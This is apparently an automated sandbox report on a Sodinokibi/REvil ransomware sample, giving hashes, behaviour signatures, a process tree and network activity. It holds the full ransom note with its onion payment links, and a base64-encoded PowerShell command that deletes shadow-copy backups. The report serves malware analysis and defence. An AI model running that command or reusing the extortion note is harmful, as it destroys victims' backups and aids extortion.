Resubmissions

14/04/2025, 17:40 UTC

250414-v89s1swlw9 10

05/02/2025, 06:51 UTC

250205-hmnx7swpgk 10

05/02/2025, 06:49 UTC

250205-hlsvrswpdj 10

28/04/2024, 18:31 UTC

240428-w6cwyaec5v 10

21/04/2024, 08:57 UTC

240421-kwwqhsfh8z 10

21/04/2024, 05:45 UTC

240421-gfvazacf82 10

18/04/2024, 19:05 UTC

240418-xry2ascb73 10

18/04/2024, 16:34 UTC

240418-t3alashf75 10

Analysis

  • max time kernel
    440s
  • max time network
    442s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/04/2025, 17:40 UTC

General

  • Target

    bazaar.2020.02/HEUR-Trojan-Ransom.Win32.Sodin.dll

  • Size

    166KB

  • MD5

    9e9b0ef4fc739c3eb36a762122451992

  • SHA1

    035fe67a3d04f0a678724851cabc917b28416fe1

  • SHA256

    0ee7783213426a5e46bc11a91acf5f2d73890bb09bbf4f3b932a4b79eeb6b820

  • SHA512

    01435694c0941b004584d40c3d11866e8f319445ed937095d9777911bd6f36c6bd9449b4effa369120cf6ded9de9a375719e256c6f8380bd5fbd4f4ca0c6d715

  • SSDEEP

    3072:JLFrb30BRtBZZg+i2ayyYOCWGPyLydrkxMT3Q7FTivJ:NJ0BXScFyfC3Hd4yg7Fu

Malware Config

Extracted

Path

C:\Program Files\37ox407-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 37ox407. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/758F651888F44227 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/758F651888F44227 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: thEETeIzS+LpbYfmz7Xuezpk2ihcjqUXgGGK344LtzWIjcvnVW6K2GKsc1DfHwG5 p/r8eYV186ds/eTzDIJOQRpEj/wsK2nwAv8DaBFeQALtCGdC1SJ8quOqGWxBFqmm HjpbsdI74Dc7tQ8xccuSbWFFio0kHQKuqnxjNOqLfxz484Mxs0cYeNJ56CQGkhcs xVERz5ZOC8IdMXH/VtRAvIln2tqi+14YV0mOIpBUDvkjZAyKHTPFxirqbp5p1a6X ai+aI8T/h53MJ6QiGazZFFKV6xQdKh6GsFkga8ZmPDJY5FMU1R34cDIkhZsf/fun lysa5koLdO5ec6WrDIjZnwJTphKJU+NsG8EeL0EEz9Ynb8eAXPE9WmKLQ3xbcU2D fpMzxTfJavOKPKfRL1TE1r3GcWcTtswtcDn9qF1G5hd/ny191bhaWz3e+k43ZFmx 7C7SBMnNLdm5ltkOpCNOnUoKMpxeOzq3B9GhJI5a491qyUB4J57bPnMMsnuSiwWT 084i8ZkRzeHPUkeLtH8IhjSH0mA/TPaMWaGHL09NzlIgFvF/hK8UIs8H/mXFmhkJ 4kqA5S7S7dYoA3epPGW3pQcrhoVwTfCLiVn2XAATTg5moKu0nmGBkeSwlbLqQMe5 ff0JHLFsbOl6Ju9ytHpJXx23t+bEnHM9rCZZKBujiol9Zu1Zv7dGZHvifZ+IS1wn F2Suqxvx7YVra7z9pmQ5f4m6+O7QZijF0azRXRGrq0b2CxVD9OrIubd8KTThJSfM 4n5PN2HCPWjPblixjy0UCVVDKhlJQEXFCe6cmmj6LXZPA9EssrbmoE5IfjsDheSS 8wm2NDZkdAw3MzOUfOFjKRnv7gMdokxYHtv3RKLZyhtkQMdUM1h0EOa6BF01XtRN S1M4f+qMrIpe9z0hjFQLy4U0hs9z+lPAd9ToRgWb3Elwg5FpY4ZgcQrBbjklcBJZ 3+L03SUKJ0C/TxdiwiCMu/A9QrIKr7ky5aYMZYaCKZIyz4p+9Ys0NyedAcCbzzM8 iBo7pckqzgmn37l0LJmdzTZSMaP53rVpCiIRyWnWPmvTbUNI3QX03uQpohGcpOC7 XsiTKhEXQ++fHh/wiDh3YeEWaNIQpFbmy6rsSnh8ROqKdG8gK0SpE6X7/OU0HD8T 7sex9+gBQuMnj7MZ1zdyWkGcXBjsszfqOy/WPH2/YJFht0rzoTNlzt5o2vAVfw2B 71zpy6uM4FzT2SzzZSauaQnl5XvtFjQpD5VwbXjMI5D5tJ5YhVA95tSO6LOn/fok i2pH1OJLhWnhvL8gI+yX9PHe/RomV4iXoBoxeC0gdM9CCPBjXLDpB4IrnnunruSp LYnI3/EbOScBlDAVGYZtfsrsVxTgfaafyErMoKMvJrBi0c1ZWXSY1A== Extension name: 37ox407 -------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!! A system of morality which is based on relative emotional values is a mere illusion, a thoroughly vulgar conception which has nothing sound in it and nothing true. Socrates
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/758F651888F44227

http://decryptor.cc/758F651888F44227

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Sodinokibi family
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 26 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\bazaar.2020.02\HEUR-Trojan-Ransom.Win32.Sodin.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5456
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\bazaar.2020.02\HEUR-Trojan-Ransom.Win32.Sodin.dll,#1
      2⤵
      • Enumerates connected drives
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:860
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5664
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:5676
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:5224

    Network

    • flag-us
      DNS
      c.pki.goog
      Remote address:
      8.8.8.8:53
      Request
      c.pki.goog
      IN A
      Response
      c.pki.goog
      IN CNAME
      pki-goog.l.google.com
      pki-goog.l.google.com
      IN A
      142.250.180.3
    • flag-gb
      GET
      http://c.pki.goog/r/r1.crl
      Remote address:
      142.250.180.3:80
      Request
      GET /r/r1.crl HTTP/1.1
      Cache-Control: max-age = 3000
      Connection: Keep-Alive
      Accept: */*
      If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: c.pki.goog
      Response
      HTTP/1.1 200 OK
      Accept-Ranges: bytes
      Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
      Cross-Origin-Resource-Policy: cross-origin
      Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
      Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
      Content-Length: 993
      X-Content-Type-Options: nosniff
      Server: sffe
      X-XSS-Protection: 0
      Date: Mon, 14 Apr 2025 17:02:38 GMT
      Expires: Mon, 14 Apr 2025 17:52:38 GMT
      Cache-Control: public, max-age=3000
      Age: 2446
      Last-Modified: Thu, 03 Apr 2025 14:18:00 GMT
      Content-Type: application/pkix-crl
      Vary: Accept-Encoding
    • 142.250.180.3:80
      http://c.pki.goog/r/r1.crl
      http
      476 B
      1.9kB
      6
      5

      HTTP Request

      GET http://c.pki.goog/r/r1.crl

      HTTP Response

      200
    • 8.8.8.8:53
      c.pki.goog
      dns
      56 B
      107 B
      1
      1

      DNS Request

      c.pki.goog

      DNS Response

      142.250.180.3

    MITRE ATT&CK Enterprise v16

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Program Files\37ox407-readme.txt

      Filesize

      7KB

      MD5

      306da216c1de0b4ab454338cda021d72

      SHA1

      faeff3880d1bcdba0e3df9dac08820672f1798c2

      SHA256

      a4a83abf0d3bf24a128955f3de47ceb6b44a60a921ef43609445517e99c543e3

      SHA512

      df210e509ab9b62b6d2a14df574f30cf184342c4db1a841c7f9358a1b0f9c261f4b11168b748fc3d97a80b6e98838baf5924992f3c6d2739954d9c19f0cc0747

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_le0jhkt4.wzg.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/5664-0-0x00007FFBB5613000-0x00007FFBB5615000-memory.dmp

      Filesize

      8KB

    • memory/5664-6-0x000001C4073C0000-0x000001C4073E2000-memory.dmp

      Filesize

      136KB

    • memory/5664-11-0x00007FFBB5610000-0x00007FFBB60D1000-memory.dmp

      Filesize

      10.8MB

    • memory/5664-12-0x00007FFBB5610000-0x00007FFBB60D1000-memory.dmp

      Filesize

      10.8MB

    • memory/5664-15-0x00007FFBB5610000-0x00007FFBB60D1000-memory.dmp

      Filesize

      10.8MB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.